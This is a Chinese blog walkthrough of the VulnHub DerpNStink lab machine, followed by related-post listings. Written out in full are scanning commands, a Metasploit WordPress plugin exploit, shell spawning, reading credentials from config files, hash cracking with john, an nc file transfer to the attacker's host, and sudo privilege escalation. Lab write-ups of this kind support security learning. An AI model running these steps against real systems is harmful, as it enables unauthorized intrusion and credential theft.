VulnHub2018_DeRPnStiNK靶机

于 2024-08-08 09:36:54 发布
阅读量675 收藏 7
点赞数 13
文章标签: 网络安全 开源 github 学习方法 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/141017622
版权

靶机地址:DerpNStink: 1 ~ VulnHub

将靶机和攻击机kali同时设为桥接模式,保证在同一网段;查看靶机的MAC地址:

一、信息收集

扫描目标主机

arp-scan -l

使用nmap扫描靶机开放的端口:

nmap -sV -p- 192.168.7.24

浏览器访问80端口:

右键检查,查看源代码,发现第一个flag——flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

同时使用dirb扫描目录:

dirb http://192.168.7.24/

拼接/weblog/wp-admin/,发现出现跳转,需要对其在hosts文件对域名和IP进行绑定(hosts文件位置:/etc/hosts),再重新访问

尝试弱口令admin admin ,发现登陆成功,并且知道了wordpress的版本为4.6.29

二、Getshell

使用wpscan扫描网站插件

wpscan --url http://derpnstink.local/weblog

使用msf搜索其插件的历史漏洞 ,进行利用

msfconsole
search slideshow
use 1
show options
set rhosts derpnstink.local
set WP_PASSWORD admin
set WP_USER admin
set TARGETURI /weblog
run

shell
python -c 'import pty;pty.spawn("/bin/bash")'

cd /var/www/html/weblog     #切换到网站目录
ls
cat wp-config.php           #查看配置文件,发现了数据库的账号密码

拼接/php/phpmyadmin/,是数据库的登录页面:

使用账号密码 root mysql 登录,登录成功

点击wordpress—>wp_posts发现了第二个flag:flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

点击wordpress—>wp_users,发现了两组账号密码

unclestinky   $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin         $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

将密码写入666.txt文件中,使用john对其进行解密

john 666.txt --wordlist=rockyou.txt

刚才使用完第一用户admin admin,现在使用第二个用户unclestinky wedgie57登录,登录成功

并且发现此账户为管理员用户

查看/wec/passwd文件,发现了处root用户的其它两个存在shell的用户:stinky 、 mrderp

尝试使用现有的密码分别进行登录,发现使用stinky/wedgie57登录成功

在桌面上发现了第三个flag:flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

尝试使用上述账号密码登录ftp,发现登陆成功:

翻看每个目录,在ssh目录下发现了key.txt文件

(🐶需要一直cd ssh,和套娃似的)

下载key.txt

ls
cat kry.txt

利用ssh指定密钥登录,发现被拒绝

ssh -i key.txt stinky@192.168.7.24

赋予600权限,ssh私钥连接成功(如果修改完权限以后,输入ssh -i key.txt stinky@192.168.7.24还一直被拒绝访问,可能是ssh证书失效了的原因,需在后面加一段命令-o PubkeyAcceptedKeyTypes=+ssh-rsa)

chmod 600 key.txt
ssh -i key.txt stinky@192.168.7.24 -o PubkeyAcceptedKeyTypes=+ssh-rsa

三、权限提升

在Document目录下发现一个 pcap 文件,尝试将其下载至本地,首先开启 nc 监听

利用nc传输文件:	
目标机器:nc -nv 192.168.7.251 1234  < derpissues.pcap
kali:	  nc -lvvp 1234 > derpissues.pcap

在kali开启一个http服务,将derpissues.pcap文件下载到本地

浏览器访问,点击下载(192.168.7.251为kali的IP)

将下载好的derpissues.pcap文件用Wireshark打开,使用以下语句搜索:

ip.src == 127.0.0.1 && http.request.method == "POST"

得到 了mrderp用户的密码:derpderpderpderpderpderpderp

切换mrderp用户

发现在/home/mrderp/binaries目录中运行所有以 derpy 开头的文件都将以 root 权限执行

sudo -l

创建binaries目录以及用户提权的脚本

mkdir binaries
cd binaries
touch derpy.sh
echo '#!/bin/bash' > derpy.sh
echo '/bin/bash' >> derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

 提权成功!

嗷嗷~嗷嗷~
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub2018_DeRPnStiNK靶机总结
qq_45301512的博客
01-16 813
靶机下载地址:dl=0打开靶机,使用nmap扫描出靶机的ip和开放的所有端口可以看到,靶机开放了21端口,22端口和80端口遇到ftp的21端,我们先尝试ftp匿名登录,用户名anonymous,密码为空,发现无法ftp匿名登录那么我们然后先根据80端口打开网站,从网站入手,不行的话,在考虑ssh的爆破打开网站,并没有发现什么功能点,可以进行漏洞利用,那么开始信息收集,目录爆破一下使用dirb扫描出来,经过查看,发现一个新的网页。
vulnhub靶场】VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 194
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1220
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1204
渗透学习
vulnhub_DeRPnStiNK靶机渗透测试
m0_66225311的博客
10-28 775
3. 本次靶机前期获得权限利用到了`wpscan`的用户名枚举和密码爆破,`wordpress`的后台`getshell`拿到网站用户的权限,毕竟`wordpress`的利用方式也就如此了,插件漏洞还是挺少用到的。只不过在信息收集阶段查看的目录有点多,没有直接单刀直入`wordpress`,收集了挺长时间的 4. 难点也就集中在了用户横向移动上来,用到了四个用户权限,`stinky`用户是利用到了网站配置文件中获得的数据库账密,在数据库中找到了该用户的密码。找到密码还是要多试一试的,万一就故意设置重复的
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1119
wordpress后台弱口令,插件Slideshow任意文件上传
Vulnhub靶机-DeRPnStiNK
ergeLXT的博客
06-28 988
服务器上有wordpress,打开/weblog/目录,被重定向到 http://derpnstink.local/weblog。使用wpscan来枚举网站 http://derpnstink.local/weblog 的插件、主题和用户。查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf。还有一个21端口,尝试登陆一下,使用stinky/wedgie57登陆成功。在ftp中找到ssh登陆的key,使用stinky用户登录成功。发现ssh不支持密码登陆,只可以通过指纹登陆。
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 283
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1975
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
t6AdmX_new靶机
08-03
t6AdmX_new靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub lin security靶机.pdf
07-29
Vulnhub lin security靶机.pdf
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8369
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
开源威胁情报查询
最新发布
学-> 思->用
08-07 130
【代码】开源威胁情报查询。
FLUX.1 实测,堪比 Midjourney 的开源 AI 绘画模型,无需本地显卡,带你免费实战
u010522887的专栏
08-07 584
玩转地表最强开源 AI 绘画模型
DocsGPT - 开源文档助手
编码时光
08-04 1038
一、关于 DocsGPT 对公司的生产支持/帮助: Roadmap 我们针对DocsGPT优化的开源模型: 用于信息检索的端到端AI框架 项目结构 二、快速入门 三、开发环境 1、启动 Mongo 和 Redis 2、运行后端 3、启动前端
如何derpnstink靶机渗透,大学毕业作业
06-10
如果您是在大学毕业作业的框架下进行derpnstink靶机的渗透测试,那么您应该首先了解derpnstink靶机的网络架构和安全策略,以及您的渗透测试目标和范围。您需要制定一个详细的计划,包括测试方法、工具和技术,以及测试的时间和资源等。在进行渗透测试之前,确保您已经获得了授权,遵守了相关的法律和道德规范,并且已经得到了derpnstink靶机的所有者或管理员的同意。 在渗透测试过程中,您可以使用一些工具和技术来测试系统的安全性,例如漏洞扫描工具、端口扫描工具、密码破解工具等。您还可以使用社会工程学等技术来测试系统的人为安全漏洞。在测试过程中,您需要记录测试结果和发现的漏洞,并及时向derpnstink靶机的所有者或管理员报告和提供建议和解决方案。 需要注意的是,渗透测试需要严格遵守法律和道德准则,不能对他人造成损害或威胁其安全和隐私。同时,您应该保护好测试过程中获得的敏感信息,以避免泄露和滥用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值